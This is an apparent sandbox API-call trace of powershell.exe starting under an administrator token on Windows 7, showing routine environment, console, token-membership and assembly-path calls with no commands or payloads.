	[0387.165] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0387.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.165] CoTaskMemFree (pv=0x34e580) 
	[0387.166] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0387.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.166] CoTaskMemFree (pv=0x34e580) 
	[0387.166] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0387.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.166] CoTaskMemFree (pv=0x34e580) 
	[0387.168] CoCreateGuid (in: pguid=0x16e088 | out: pguid=0x16e088*(Data1=0xd4048f25, Data2=0xb6a9, Data3=0x4b19, Data4=([0]=0xa9, [1]=0xe8, [2]=0x94, [3]=0xed, [4]=0xb5, [5]=0x82, [6]=0xed, [7]=0xd8))) returned 0x0
	[0387.171] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0387.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.171] CoTaskMemFree (pv=0x34e580) 
	[0387.174] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0387.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.174] CoTaskMemFree (pv=0x34e580) 
	[0387.176] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0387.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.176] CoTaskMemFree (pv=0x34e580) 
	[0387.181] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0387.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16dd30 | out: lpConsoleScreenBufferInfo=0x16dd30) returned 1
	[0387.483] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0387.483] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16dd30 | out: lpConsoleScreenBufferInfo=0x16dd30) returned 1
	[0387.484] GetVersionExW (in: lpVersionInformation=0x16dcc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dcc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0387.486] GetCurrentProcess () returned 0xffffffffffffffff
	[0387.487] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16dd58 | out: TokenHandle=0x16dd58*=0x314) returned 1
	[0387.491] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dc78 | out: TokenInformation=0x0, ReturnLength=0x16dc78) returned 0
	[0387.492] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2b7260
	[0387.492] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x2b7260, TokenInformationLength=0x4, ReturnLength=0x16dc78 | out: TokenInformation=0x2b7260, ReturnLength=0x16dc78) returned 1
	[0387.493] DuplicateTokenEx (in: hExistingToken=0x314, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16ddd8 | out: phNewToken=0x16ddd8*=0x310) returned 1
	[0387.494] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dc78 | out: TokenInformation=0x0, ReturnLength=0x16dc78) returned 0
	[0387.494] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2b7290
	[0387.494] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x2b7290, TokenInformationLength=0x4, ReturnLength=0x16dc78 | out: TokenInformation=0x2b7290, ReturnLength=0x16dc78) returned 1
	[0387.494] CheckTokenMembership (in: TokenHandle=0x310, SidToCheck=0x2d5f8f0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16dde8 | out: IsMember=0x16dde8) returned 1
	[0387.495] CloseHandle (hObject=0x310) returned 1
	[0387.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.840] CoTaskMemAlloc (cb=0x804) returned 0x1b7d82f0
	[0387.840] GetConsoleTitleW (in: lpConsoleTitle=0x1b7d82f0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0387.840] CoTaskMemFree (pv=0x1b7d82f0) 
	[0387.852] CoTaskMemAlloc (cb=0x804) returned 0x1b7d8ba0
	[0387.852] GetConsoleTitleW (in: lpConsoleTitle=0x1b7d8ba0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0387.852] CoTaskMemFree (pv=0x1b7d8ba0) 
	[0387.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.854] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0388.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0389.075] SetConsoleCtrlHandler (HandlerRoutine=0x2ad68dc, Add=1) returned 1
	[0389.570] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0389.571] CoCreateGuid (in: pguid=0x16ded0 | out: pguid=0x16ded0*(Data1=0x214d61e9, Data2=0x167f, Data3=0x413d, Data4=([0]=0x8b, [1]=0x79, [2]=0x8, [3]=0xeb, [4]=0xd9, [5]=0x17, [6]=0xbc, [7]=0xa0))) returned 0x0
	[0389.572] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.572] CoTaskMemFree (pv=0x34e580) 
	[0389.576] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.577] CoTaskMemFree (pv=0x34e580) 
	[0389.579] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.579] CoTaskMemFree (pv=0x34e580) 
	[0389.580] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.580] CoTaskMemFree (pv=0x34e580) 
	[0389.582] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.582] CoTaskMemFree (pv=0x34e580) 
	[0389.583] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.583] CoTaskMemFree (pv=0x34e580) 
	[0389.585] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.585] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.585] CoTaskMemFree (pv=0x34e580) 
	[0389.586] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.586] CoTaskMemFree (pv=0x34e580) 
	[0389.587] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.587] CoTaskMemFree (pv=0x34e580) 
	[0389.589] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.589] CoTaskMemFree (pv=0x34e580) 
	[0389.593] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.593] CoTaskMemFree (pv=0x34e580) 
	[0389.594] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.594] CoTaskMemFree (pv=0x34e580) 
	[0389.594] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0389.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.594] CoTaskMemFree (pv=0x34e580) 
	[0390.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0390.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0390.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0390.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
